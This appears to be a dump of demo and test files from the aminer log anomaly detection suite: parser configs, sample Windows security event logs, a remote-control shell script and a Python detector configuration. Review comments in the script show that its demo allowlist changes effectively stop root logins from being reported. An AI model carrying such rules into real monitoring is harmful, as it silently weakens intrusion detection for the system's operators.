'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_.:;&%=+$,/?%#\~ ' - id: timewritten type: VariableByteDataModelElement name: 'timewritten' args: 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_.:;&%=+$,/?%#\~ ' - id: username type: FixedWordlistDataModelElement name: 'username' args: - 'NT-AUTORITÄT' - '\\' - 'SYSTEM' - 'Lokaler Dienst' - id: json start: True type: JsonModelElement name: 'model' optional_key_prefix: '_' key_parser_dict: MachineName: machinename Data: data Index: index CategoryNumber: categorynumber EventID: eventid EntryType: entrytype Source: source ReplacementStrings: - replacementstrings InstanceId: instanceid TimeGenerated: timegenerated TimeWritten: timewritten +UserName: username Site: "NULL_OBJECT" Container: "NULL_OBJECT" _empty_list: EMPTY_ARRAY _empty_object: EMPTY_OBJECT Input: timestamp_paths: None json_format: True EventHandlers: - id: stpe json: true type: 
StreamPrinterEventHandler logdata-anomaly-miner-2.8.0/aecid-testsuite/demo/aminerJsonInputDemo/windows_json_logs/000077500000000000000000000000001500476301700314265ustar00rootroot00000000000000Security_Error.log000066400000000000000000000042221500476301700350320ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/demo/aminerJsonInputDemo/windows_json_logs{"MachineName":"N3IM1703.D03.arc.local","Data":"","Index":597,"CategoryNumber":12292,"EventID":5058,"EntryType":8,"Source":"Microsoft-Windows-Security-Auditing","ReplacementStrings":["S-1-5-21-1482476501-113007714-839522115-13768","admin-ea","D03","0x4a3e7d","8656","2021-04-22T09:18:20.958953800Z","Microsoft Software Key Storage Provider","UNKNOWN","Microsoft Connected Devices Platform device certificate","%%2500","C:\\Users\\admin-ea\\AppData\\Roaming\\Microsoft\\Crypto\\Keys\\de7cf8a7901d2ad13e5c67c29e5d1662_ccbe96bb-675a-4a22-b29c-5213a99e5b4f","%%2458","0x0"],"InstanceId":5058,"TimeGenerated":"2021-04-22T11:18:22+02:00","TimeWritten":"2021-04-22T11:18:22+02:00","UserName":null,"Site":null,"Container":null} {"MachineName":"N3IM1703.D03.arc.local","Data":"","Index":1956,"CategoryNumber":12554,"EventID":4627,"EntryType":8,"Source":"Microsoft-Windows-Security-Auditing","ReplacementStrings":["S-1-5-18","N3IM1703$","D03","0x3e7","S-1-5-18","SYSTEM","NT-AUTORITT","0x3e7","5","1","1","\r\n\t\t%S-1-5-32-544\r\n\t\t%S-1-1-0\r\n\t\t%S-1-5-11\r\n\t\t%S-1-16-16384"],"InstanceId":4627,"TimeGenerated":"2021-04-28T09:59:47+02:00","TimeWritten":"2021-04-28T09:59:47+02:00","UserName":null,"Site":null,"Container":null} 
{"MachineName":"N3IM1703.D03.arc.local","Data":"","Index":1956,"CategoryNumber":12554,"EventID":4627,"EntryType":8,"Source":"Microsoft-Windows-Security-Auditing","ReplacementStrings":["S-1-5-18","N3IM1703$","D03","0x3e7","S-1-5-18","SYSTEM","NT-AUTORITT","0x3e7","5","1","1","%S-1-5-32-544%S-1-1-0%S-1-5-11%S-1-16-16384"],"InstanceId":4627,"TimeGenerated":"2021-04-28T09:59:47+02:00","TimeWritten":"2021-04-28T09:59:47+02:00","UserName":null,"Site":null,"Container":null} {"MachineName":"N3IM1703.D03.arc.local","Data":"","Index":12293,"CategoryNumber":13826,"EventID":4799,"EntryType":8,"Source":"Microsoft-Windows-Security-Auditing","ReplacementStrings":["Zugriffssteuerungs-Unterstützungsoperatoren","Builtin","S-1-5-32-579","S-1-5-18","N3IM1703$","D03","0x3e7","0x1680","C:\\Windows\\System32\\wbem\\WmiPrvSE.exe"],"InstanceId":4799,"TimeGenerated":"2021-05-10T09:38:03+02:00","TimeWritten":"2021-05-10T09:38:03+02:00","UserName":null,"Site":null,"Container":null} Security_Working.log000066400000000000000000000011101500476301700353520ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/demo/aminerJsonInputDemo/windows_json_logs{"MachineName":"N3IM1703.D03.arc.local","Data":"","Index":597,"CategoryNumber":12292,"EventID":5058,"EntryType":8,"Source":"Microsoft-Windows-Security-Auditing","ReplacementStrings":["S-1-5-21-1482476501-113007714-839522115-13768","admin-ea","D03","0x4a3e7d","8656","2021-04-22T09:18:20.958953800Z","Microsoft Software Key Storage Provider","UNKNOWN","Microsoft Connected Devices Platform device certificate","%%2500","%%2458","0x0"],"InstanceId":5058,"TimeGenerated":"2021-04-22T11:18:22+02:00","TimeWritten":"2021-04-22T11:18:22+02:00","UserName":null,"Site":null,"Container":null} 
logdata-anomaly-miner-2.8.0/aecid-testsuite/demo/aminerRemoteControl/000077500000000000000000000000001500476301700257155ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/demo/aminerRemoteControl/aminerRemoteControlDemo.sh000077500000000000000000000176531500476301700330650ustar00rootroot00000000000000#!/bin/bash #removes the 'LogPrefix' sudo aminerremotecontrol --exec "change_config_property(analysis_context, 'LogPrefix', '')" #renames the 'NewMatchPathValueCombo' component to 'NewMatchPathValueComboDetector' sudo aminerremotecontrol --exec "rename_registered_analysis_component(analysis_context,'NewMatchPathValueCombo','NewMatchPathValueComboDetector')" #changes the 'learn_mode' of the 'NewMatchPathValueComboDetector' to False. sudo aminerremotecontrol --exec "change_attribute_of_registered_analysis_component(analysis_context, 'NewMatchPathValueComboDetector', 'learn_mode', False)" #prints the current list of target_path_list sudo aminerremotecontrol --exec "print_attribute_of_registered_analysis_component(analysis_context, 'NewMatchPathValueComboDetector', 'target_path_list')" #adds a new path to the 'NewMatchPathValueComboDetector' component. sudo aminerremotecontrol --exec "change_attribute_of_registered_analysis_component(analysis_context, 'NewMatchPathValueComboDetector', 'target_path_list', ['/model/IPAddresses/Username', '/model/IPAddresses/IP', 'new/path'])" #changes the 'learn_mode' of the 'NewMatchPathValueComboDetector' to True to start the learning phase. sudo aminerremotecontrol --exec "change_attribute_of_registered_analysis_component(analysis_context, 'NewMatchPathValueComboDetector', 'learn_mode', True)" sleep 1 #changes the 'learn_mode' of the 'NewMatchPathValueComboDetector' to False to end the learning phase. 
sudo aminerremotecontrol --exec "change_attribute_of_registered_analysis_component(analysis_context, 'NewMatchPathValueComboDetector', 'learn_mode', False)"

# Prints 'Resources.MaxMemoryUsage', changes it to -1 (meaning all available memory may be used) and prints it again.
# NOTE(review): -1 presumably removes aminer's own memory bound; acceptable for a demo, but keep a finite value on a real instance
# so that runaway detector state cannot exhaust the host.
sudo aminerremotecontrol --data '["Resources.MaxMemoryUsage", -1]' --exec 'print_config_property(analysis_context, "%s" % remote_control_data[0])' --exec 'change_config_property(analysis_context, "%s" % remote_control_data[0], remote_control_data[1])' --exec 'print_config_property(analysis_context, "%s" % remote_control_data[0])'

# Adds two new NewMatchPathDetector instances to the running config.
# The --exec argument is Python that the aminer process evaluates (it builds detector objects here), so only ever pass trusted,
# operator-written input to it.
sudo aminerremotecontrol --exec "add_handler_to_atom_filter_and_register_analysis_component(analysis_context, 'AtomFilter', NewMatchPathDetector(analysis_context.aminer_config, analysis_context.atomizer_factory.atom_handler_list, learn_mode=True), 'NewMatchPathDet')"
sudo aminerremotecontrol --exec "add_handler_to_atom_filter_and_register_analysis_component(analysis_context, 'AtomFilter', NewMatchPathDetector(analysis_context.aminer_config, analysis_context.atomizer_factory.atom_handler_list, learn_mode=True), 'NewMatchPathDet1')"

# Prints the current config to the console.
#sudo aminerremotecontrol --exec "print_current_config(analysis_context)" --string-response

# Saves the current config to /tmp/config.py.
# NOTE(review): /tmp is shared with every local user; outside a demo, write the config to a directory owned by the aminer user.
sudo aminerremotecontrol --exec "save_current_config(analysis_context,'/tmp/config.py')"

# Lists the events from the VolatileLogarithmicBackoffEventHistory component, at most 10 of them.
sudo aminerremotecontrol --exec "list_events_from_history(analysis_context,'VolatileLogarithmicBackoffEventHistory',10)" --string-response

# Prints the event with the id 12 from the history.
sudo aminerremotecontrol --exec "dump_events_from_history(analysis_context,'VolatileLogarithmicBackoffEventHistory',12)" --string-response

# Prints the event with the id 13 from the history.
sudo aminerremotecontrol --exec "dump_events_from_history(analysis_context,'VolatileLogarithmicBackoffEventHistory',13)" --string-response

# Prints the event with the id 15 from the history.
sudo aminerremotecontrol --exec "dump_events_from_history(analysis_context,'VolatileLogarithmicBackoffEventHistory',15)" --string-response

# Ignores the events with the ids 12, 13 and 15 from the history.
sudo aminerremotecontrol --exec "ignore_events_from_history(analysis_context,'VolatileLogarithmicBackoffEventHistory',[12,13,15])" --string-response

# Allowlists the events with the ids 21, 22 and 23 from the history.
sudo aminerremotecontrol --exec "allowlist_events_from_history(analysis_context,'VolatileLogarithmicBackoffEventHistory',[21,22,23])" --string-response

# Currently the following rules must be met to not create an allowlist violation:
# User root (logged in, logged out) or User 'username' (logged in, logged out) x minutes ago.
# allowlist_rules = [Rules.OrMatchRule([Rules.AndMatchRule([Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes'), Rules.NegationMatchRule(Rules.ValueMatchRule('/model/LoginDetails/Username', b'root'))]), Rules.AndMatchRule([Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes')),Rules.PathExistsMatchRule('/model/LoginDetails')]),Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails'))])]

# In the first step we print the current allowlist_rules. It may be necessary to enlarge AnalysisChildRemoteControlHandler.maxControlPacketSize.
#sudo aminerremotecontrol --exec "print_attribute_of_registered_analysis_component(analysis_context,'Allowlist','allowlist_rules')" --string-response

# In the second step we add the user admin so that it is treated like the root user, by adding another rule.
# NOTE(review): assuming Or/And/NegationMatchRule have their literal semantics, the new branch is ORed with the root branch, and
# "username != root" OR "username != admin" holds for every username (root satisfies the admin branch and vice versa). The rule set
# below therefore stops reporting root as well. To exempt both users from the "x minutes ago" form, both NegationMatchRules belong
# inside ONE AndMatchRule together with the PathExistsMatchRule.
sudo aminerremotecontrol --exec "change_attribute_of_registered_analysis_component(analysis_context,'Allowlist','allowlist_rules',[Rules.OrMatchRule([Rules.AndMatchRule([Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes'), Rules.NegationMatchRule(Rules.ValueMatchRule('/model/LoginDetails/Username', b'root'))]), Rules.AndMatchRule([Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes'), Rules.NegationMatchRule(Rules.ValueMatchRule('/model/LoginDetails/Username', b'admin'))]),Rules.AndMatchRule([Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes')),Rules.PathExistsMatchRule('/model/LoginDetails')]),Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails'))])])"

# In the third step we rename the user admin to the user administrator and leave all other rules (same ORing caveat as above).
sudo aminerremotecontrol --exec "change_attribute_of_registered_analysis_component(analysis_context,'Allowlist','allowlist_rules',[Rules.OrMatchRule([Rules.AndMatchRule([Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes'), Rules.NegationMatchRule(Rules.ValueMatchRule('/model/LoginDetails/Username', b'root'))]), Rules.AndMatchRule([Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes'), Rules.NegationMatchRule(Rules.ValueMatchRule('/model/LoginDetails/Username', b'administrator'))]),Rules.AndMatchRule([Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes')),Rules.PathExistsMatchRule('/model/LoginDetails')]),Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails'))])])"

# In the last step we remove all special rules and only allow User 'username' (logged in, logged out) x minutes ago.
sudo aminerremotecontrol --exec "change_attribute_of_registered_analysis_component(analysis_context,'Allowlist','allowlist_rules',[Rules.OrMatchRule([Rules.AndMatchRule([Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes')),Rules.PathExistsMatchRule('/model/LoginDetails')]),Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails'))])])" # Adds a new path to the known_path_set sudo aminerremotecontrol --exec "allowlist_event_in_component(analysis_context,'NewMatchPathDet',['/new/path1','/new/path2'])" --string-response # Persist all data. sudo aminerremotecontrol --exec "persist_all()" # List all backups. sudo aminerremotecontrol --exec "list_backups(analysis_context)" # Create a backup. sudo aminerremotecontrol --exec "create_backup(analysis_context)" # suspend the aminer. sudo aminerremotecontrol --exec "suspend" # activate the aminer. sudo aminerremotecontrol --exec "activate" # reopen all StreamPrinterEventHandler streams. sudo aminerremotecontrol --exec "reopen_event_handler_streams(analysis_context)" logdata-anomaly-miner-2.8.0/aecid-testsuite/demo/aminerRemoteControl/demo-config.py000066400000000000000000000501461500476301700304640ustar00rootroot00000000000000from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.OptionalMatchModelElement import 
OptionalMatchModelElement # This is a template for the "aminer" logfile miner tool. Copy # it to "config.py" and define your ruleset. config_properties = {} # Define the list of log resources to read from: the resources # named here do not need to exist when aminer is started. This # will just result in a warning. However, if they exist, they have # to be readable by the aminer process! Supported types are: # * file://[path]: Read data from file, reopen it after rollover # * unix://[path]: Open the path as UNIX local socket for reading config_properties['LogResourceList'] = ['file:///tmp/syslog'] # Define the uid/gid of the process that runs the calculation # after opening the log files: config_properties['AminerUser'] = 'aminer' config_properties['AminerGroup'] = 'aminer' # Define the path, where aminer will listen for incoming remote # control connections. When missing, no remote control socket # will be created. config_properties['RemoteControlSocket'] = '/var/run/aminer-remote.socket' # Read the analyis from this file. That part of configuration # is separated from the main configuration so that it can be loaded # only within the analysis child. Non-absolute path names are # interpreted relatively to the main configuration file (this # file). When empty, this configuration has to contain the configuration # for the child also. # config_properties['AnalysisConfigFile'] = 'analysis.py' config_properties['Core.LogDir'] = '/tmp/lib/aminer/log' # Read and store information to be used between multiple invocations # of aminer in this directory. The directory must only be accessible # to the 'AminerUser' but not group/world readable. On violation, # aminer will refuse to start. When undefined, '/var/lib/aminer' # is used. config_properties['Core.PersistenceDir'] = '/tmp/lib/aminer' # Define a target e-mail address to send alerts to. When undefined, # no e-mail notification hooks are added. 
config_properties['MailAlerting.TargetAddress'] = 'root@localhost' # Sender address of e-mail alerts. When undefined, "sendmail" # implementation on host will decide, which sender address should # be used. config_properties['MailAlerting.FromAddress'] = 'root@localhost' # Define, which text should be prepended to the standard aminer # subject. Defaults to "aminer Alerts:" config_properties['MailAlerting.SubjectPrefix'] = 'aminer Alerts:' # Define a grace time after startup before aminer will react to # an event and send the first alert e-mail. Defaults to 0 (any # event can immediately trigger alerting). config_properties['MailAlerting.AlertGraceTime'] = 0 # Define how many seconds to wait after a first event triggered # the alerting procedure before really sending out the e-mail. # In that timespan, events are collected and will be sent all # using a single e-mail. Defaults to 10 seconds. config_properties['MailAlerting.EventCollectTime'] = 0 # Define the minimum time between two alert e-mails in seconds # to avoid spamming. All events during this timespan are collected # and sent out with the next report. Defaults to 600 seconds. config_properties['MailAlerting.MinAlertGap'] = 0 # Define the maximum time between two alert e-mails in seconds. # When undefined this defaults to "MailAlerting.MinAlertGap". # Otherwise this will activate an exponential backoff to reduce # messages during permanent error states by increasing the alert # gap by 50% when more alert-worthy events were recorded while # the previous gap time was not yet elapsed. config_properties['MailAlerting.MaxAlertGap'] = 600 # Define how many events should be included in one alert mail # at most. This defaults to 1000 config_properties['MailAlerting.MaxEventsPerMessage'] = 1000 config_properties['LogPrefix'] = 'Original log line: ' # Add your ruleset here: def build_analysis_pipeline(analysis_context): """Define the function to create pipeline for parsing the log data. 
It has also to define an AtomizerFactory to instruct aminer how to process incoming data streams to create log atoms from them. """ # Build the parsing model: service_children_disk_report = [ FixedDataModelElement('Space', b' Current Disk Data is: Filesystem Type Size Used Avail Use%'), DelimitedDataModelElement('Data', b'%'), AnyByteDataModelElement('Rest')] service_children_login_details = [ FixedDataModelElement('User', b'User '), DelimitedDataModelElement('Username', b' '), FixedWordlistDataModelElement('Status', [b' logged in', b' logged out']), OptionalMatchModelElement('PastTime', SequenceModelElement('Time', [ FixedDataModelElement('Blank', b' '), DecimalIntegerValueModelElement('Minutes'), FixedDataModelElement('Ago', b' minutes ago.')]))] service_children_cron_job = [ DateTimeModelElement('DTM', b'%Y-%m-%d %H:%M:%S'), FixedDataModelElement('UNameSpace1', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('UNameSpace2', b' '), DelimitedDataModelElement('User', b' '), FixedDataModelElement('Cron', b' cron['), DecimalIntegerValueModelElement('JobNumber'), FixedDataModelElement('Details', b']: Job `cron.daily` started.')] service_children_random_time = [FixedDataModelElement('Space', b'Random: '), DecimalIntegerValueModelElement('Random')] service_children_sensors = [SequenceModelElement('CPUTemp', [ FixedDataModelElement('FixedTemp', b'CPU Temp: '), DecimalIntegerValueModelElement('Temp'), FixedDataModelElement('Degrees', b'\xc2\xb0C')]), FixedDataModelElement('Space1', b', '), SequenceModelElement('CPUWorkload', [ FixedDataModelElement('FixedWorkload', b'CPUWorkload: '), DecimalIntegerValueModelElement('Workload'), FixedDataModelElement('Percent', b'%')]), FixedDataModelElement('Space2', b', '), DateTimeModelElement('DTM', b'%Y-%m-%d %H:%M:%S')] service_children_user_ip_address = [ FixedDataModelElement('User', b'User '), DelimitedDataModelElement('Username', b' '), FixedDataModelElement('Action', b' changed IP address to '), 
IpAddressDataModelElement('IP')] service_children_cron_job_announcement = [ DateTimeModelElement('DTM', b'%Y-%m-%d %H:%M:%S'), FixedDataModelElement('Space', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('Cron', b' cron['), DecimalIntegerValueModelElement('JobNumber'), FixedDataModelElement('Run', b']: Will run job `'), FixedWordlistDataModelElement('CronType', [b'cron.daily', b'cron.hourly', b'cron.monthly', b'cron.weekly']), FixedDataModelElement('StartTime', b'\' in 5 min.')] service_children_cron_job_execution = [ DateTimeModelElement('DTM', b'%Y-%m-%d %H:%M:%S'), FixedDataModelElement('Space1', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('Cron', b' cron['), DecimalIntegerValueModelElement('JobNumber'), FixedDataModelElement('Job', b']: Job `'), FixedWordlistDataModelElement('CronType', [b'cron.daily', b'cron.hourly', b'cron.monthly', b'cron.weekly']), FixedDataModelElement('Started', b'\' started')] parsing_model = FirstMatchModelElement('model', [ SequenceModelElement('CronAnnouncement', service_children_cron_job_announcement), SequenceModelElement('CronExecution', service_children_cron_job_execution), SequenceModelElement('DailyCron', service_children_cron_job), SequenceModelElement('DiskReport', service_children_disk_report), SequenceModelElement('LoginDetails', service_children_login_details), DecimalIntegerValueModelElement('Random'), SequenceModelElement('RandomTime', service_children_random_time), SequenceModelElement('Sensors', service_children_sensors), SequenceModelElement('IPAddresses', service_children_user_ip_address)]) # Some generic imports. from aminer.analysis import AtomFilters # Create all global handler lists here and append the real handlers later on. # Use this filter to distribute all atoms to the analysis handlers. 
atom_filters = AtomFilters.SubhandlerFilter(None) analysis_context.register_component(atom_filters, component_name="AtomFilter") from aminer.analysis.TimestampCorrectionFilters import SimpleMonotonicTimestampAdjust simple_monotonic_timestamp_adjust = SimpleMonotonicTimestampAdjust([atom_filters]) analysis_context.register_component(simple_monotonic_timestamp_adjust, component_name="SimpleMonotonicTimestampAdjust") from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler stream_printer_event_handler = StreamPrinterEventHandler(analysis_context) from aminer.events.Utils import VolatileLogarithmicBackoffEventHistory volatile_logarithmic_backoff_event_history = VolatileLogarithmicBackoffEventHistory(100) anomaly_event_handlers = [stream_printer_event_handler, volatile_logarithmic_backoff_event_history] analysis_context.register_component(volatile_logarithmic_backoff_event_history, component_name="VolatileLogarithmicBackoffEventHistory") # Now define the AtomizerFactory using the model. A simple line based one is usually sufficient. from aminer.input.SimpleByteStreamLineAtomizerFactory import SimpleByteStreamLineAtomizerFactory analysis_context.atomizer_factory = SimpleByteStreamLineAtomizerFactory( parsing_model, [simple_monotonic_timestamp_adjust], anomaly_event_handlers, use_real_time=True) # Just report all unparsed atoms to the event handlers. 
from aminer.analysis.UnparsedAtomHandlers import SimpleUnparsedAtomHandler simple_unparsed_atom_handler = SimpleUnparsedAtomHandler(anomaly_event_handlers) atom_filters.add_handler(simple_unparsed_atom_handler, stop_when_handled_flag=True) analysis_context.register_component(simple_unparsed_atom_handler, component_name="UnparsedHandler") from aminer.analysis.TimestampsUnsortedDetector import TimestampsUnsortedDetector timestamps_unsorted_detector = TimestampsUnsortedDetector(analysis_context.aminer_config, anomaly_event_handlers) atom_filters.add_handler(timestamps_unsorted_detector) analysis_context.register_component(timestamps_unsorted_detector, component_name="TimestampsUnsortedDetector") from aminer.analysis import Rules from aminer.analysis.AllowlistViolationDetector import AllowlistViolationDetector allowlist_rules = [ Rules.OrMatchRule([ Rules.AndMatchRule([ Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes'), Rules.NegationMatchRule(Rules.ValueMatchRule('/model/LoginDetails/Username', b'root'))]), Rules.AndMatchRule([ Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes')), Rules.PathExistsMatchRule('/model/LoginDetails')]), Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails'))])] # This rule list should trigger, when the line does not look like: User root (logged in, logged out) # or User 'username' (logged in, logged out) x minutes ago. 
allowlist_violation_detector = AllowlistViolationDetector(analysis_context.aminer_config, allowlist_rules, anomaly_event_handlers) analysis_context.register_component(allowlist_violation_detector, component_name="Allowlist") atom_filters.add_handler(allowlist_violation_detector) from aminer.analysis.ParserCount import ParserCount parser_count = ParserCount(analysis_context.aminer_config, None, anomaly_event_handlers, 10) analysis_context.register_component(parser_count, component_name="ParserCount") atom_filters.add_handler(parser_count) from aminer.analysis.EventCorrelationDetector import EventCorrelationDetector ecd = EventCorrelationDetector(analysis_context.aminer_config, anomaly_event_handlers, check_rules_flag=True, hypothesis_max_delta_time=1.0, learn_mode=True) analysis_context.register_component(ecd, component_name="EventCorrelationDetector") atom_filters.add_handler(ecd) from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector new_match_path_detector = NewMatchPathDetector(analysis_context.aminer_config, anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_detector, component_name="NewMatchPath") atom_filters.add_handler(new_match_path_detector) def tuple_transformation_function(match_value_list): """Only allow output of the EnhancedNewMatchPathValueComboDetector after every 10000th element.""" extra_data = enhanced_new_match_path_value_combo_detector.known_values_dict.get(tuple(match_value_list)) if extra_data is not None: mod = 10000 if (extra_data[2] + 1) % mod == 0: enhanced_new_match_path_value_combo_detector.learn_mode = False else: enhanced_new_match_path_value_combo_detector.learn_mode = True return match_value_list from aminer.analysis.EnhancedNewMatchPathValueComboDetector import EnhancedNewMatchPathValueComboDetector enhanced_new_match_path_value_combo_detector = EnhancedNewMatchPathValueComboDetector( analysis_context.aminer_config, ['/model/DailyCron/UName', '/model/DailyCron/JobNumber'], 
anomaly_event_handlers, learn_mode=False, tuple_transformation_function=tuple_transformation_function) analysis_context.register_component(enhanced_new_match_path_value_combo_detector, component_name="EnhancedNewValueCombo") atom_filters.add_handler(enhanced_new_match_path_value_combo_detector) from aminer.analysis.HistogramAnalysis import HistogramAnalysis, LinearNumericBinDefinition, ModuloTimeBinDefinition, \ PathDependentHistogramAnalysis modulo_time_bin_definition = ModuloTimeBinDefinition(86400, 3600, 0, 1, 24, True) linear_numeric_bin_definition = LinearNumericBinDefinition(50, 5, 20, True) histogram_analysis = HistogramAnalysis(analysis_context.aminer_config, [ ('/model/RandomTime/Random', modulo_time_bin_definition), ('/model/Random', linear_numeric_bin_definition)], 10, anomaly_event_handlers) analysis_context.register_component(histogram_analysis, component_name="HistogramAnalysis") atom_filters.add_handler(histogram_analysis) path_dependent_histogram_analysis = PathDependentHistogramAnalysis(analysis_context.aminer_config, '/model/RandomTime', modulo_time_bin_definition, 10, anomaly_event_handlers) analysis_context.register_component(path_dependent_histogram_analysis, component_name="PathDependentHistogramAnalysis") atom_filters.add_handler(path_dependent_histogram_analysis) from aminer.analysis.MatchValueAverageChangeDetector import MatchValueAverageChangeDetector match_value_average_change_detector = MatchValueAverageChangeDetector(analysis_context.aminer_config, anomaly_event_handlers, None, ['/model/Random'], 100, 10) analysis_context.register_component(match_value_average_change_detector, component_name="MatchValueAverageChange") atom_filters.add_handler(match_value_average_change_detector) import sys from aminer.analysis.MatchValueStreamWriter import MatchValueStreamWriter match_value_stream_writer = MatchValueStreamWriter( sys.stdout, ['/model/Sensors/CPUTemp', '/model/Sensors/CPUWorkload', '/model/Sensors/DTM'], b';', b'') 
analysis_context.register_component(match_value_stream_writer, component_name="MatchValueStreamWriter") atom_filters.add_handler(match_value_stream_writer) from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector new_match_path_value_combo_detector = NewMatchPathValueComboDetector(analysis_context.aminer_config, [ '/model/IPAddresses/Username', '/model/IPAddresses/IP'], anomaly_event_handlers, learn_mode=False) analysis_context.register_component(new_match_path_value_combo_detector, component_name="NewMatchPathValueCombo") atom_filters.add_handler(new_match_path_value_combo_detector) from aminer.analysis.NewMatchIdValueComboDetector import NewMatchIdValueComboDetector new_match_id_value_combo_detector = NewMatchIdValueComboDetector( analysis_context.aminer_config, ['/model/type/path/id', '/model/type/syscall/id'], anomaly_event_handlers, id_path_list=['/model/type/path/id', '/model/type/syscall/id'], min_allowed_time_diff=5, learn_mode=True, allow_missing_values_flag=True, output_logline=True) analysis_context.register_component(new_match_id_value_combo_detector, component_name="NewMatchIdValueComboDetector") atom_filters.add_handler(new_match_id_value_combo_detector) from aminer.analysis.NewMatchPathValueDetector import NewMatchPathValueDetector new_match_path_value_detector = NewMatchPathValueDetector(analysis_context.aminer_config, [ '/model/DailyCron/Job Number', '/model/IPAddresses/Username'], anomaly_event_handlers, learn_mode=False) analysis_context.register_component(new_match_path_value_detector, component_name="NewMatchPathValue") atom_filters.add_handler(new_match_path_value_detector) from aminer.analysis.MissingMatchPathValueDetector import MissingMatchPathValueDetector missing_match_path_value_detector = MissingMatchPathValueDetector( analysis_context.aminer_config, ['/model/DiskReport/Space'], anomaly_event_handlers, learn_mode=False, default_interval=2, realert_interval=5) 
analysis_context.register_component(missing_match_path_value_detector, component_name="MissingMatch") atom_filters.add_handler(missing_match_path_value_detector) from aminer.analysis.TimeCorrelationDetector import TimeCorrelationDetector time_correlation_detector = TimeCorrelationDetector( analysis_context.aminer_config, anomaly_event_handlers, 2, min_rule_attributes=1, max_rule_attributes=5, record_count_before_event=70000, output_logline=True) analysis_context.register_component(time_correlation_detector, component_name="TimeCorrelationDetector") atom_filters.add_handler(time_correlation_detector) from aminer.analysis.TimeCorrelationViolationDetector import TimeCorrelationViolationDetector, CorrelationRule, EventClassSelector cron_job_announcement = CorrelationRule('CronJobAnnouncement', 5, 6, artefact_match_parameters=[ ('/model/CronAnnouncement/JobNumber', '/model/CronExecution/JobNumber')]) a_class_selector = EventClassSelector('Announcement', [cron_job_announcement], None) b_class_selector = EventClassSelector('Execution', None, [cron_job_announcement]) rules = [Rules.PathExistsMatchRule('/model/CronAnnouncement/Run', a_class_selector), Rules.PathExistsMatchRule('/model/CronExecution/Job', b_class_selector)] time_correlation_violation_detector = TimeCorrelationViolationDetector(analysis_context.aminer_config, rules, anomaly_event_handlers) analysis_context.register_component(time_correlation_violation_detector, component_name="TimeCorrelationViolationDetector") atom_filters.add_handler(time_correlation_violation_detector) from aminer.events.DefaultMailNotificationEventHandler import DefaultMailNotificationEventHandler if DefaultMailNotificationEventHandler.CONFIG_KEY_MAIL_TARGET_ADDRESS in analysis_context.aminer_config.config_properties: mail_notification_handler = DefaultMailNotificationEventHandler(analysis_context) analysis_context.register_component(mail_notification_handler, component_name="MailHandler") 
anomaly_event_handlers.append(mail_notification_handler) logdata-anomaly-miner-2.8.0/aecid-testsuite/demo/aminerXmlInputDemo/000077500000000000000000000000001500476301700255065ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/demo/aminerXmlInputDemo/aminerXmlInputDemo.sh000077500000000000000000000022701500476301700316270ustar00rootroot00000000000000#!/bin/bash . ./testFunctions.sh LOGFILE=/tmp/syslog sudo mkdir /tmp/lib 2> /dev/null sudo mkdir /tmp/lib/aminer 2> /dev/null sudo chown -R $USER:$USER /tmp/lib/aminer 2> /dev/null sudo rm -r /tmp/lib/aminer/* 2> /dev/null sudo mkdir /tmp/lib/aminer/log 2> /dev/null sudo chown -R aminer:aminer /tmp/lib/aminer 2> /dev/null sudo rm $LOGFILE 2> /dev/null echo "Demo started.." echo "" FILE=/tmp/xml-input-demo-config.yml if ! test -f "$FILE"; then echo "$FILE does not exist!" exit 1 fi read -r -d '' VAR << END Tove Jani Don't forget me this weekend! Don't forget me this weekend! Jani Tove Re: I will not I will not END echo "$VAR" >> $LOGFILE runAminerUntilEnd "sudo aminer --config $FILE" "$LOGFILE" "/tmp/lib/aminer/AnalysisChild/RepositioningData" "$FILE" exit $? 
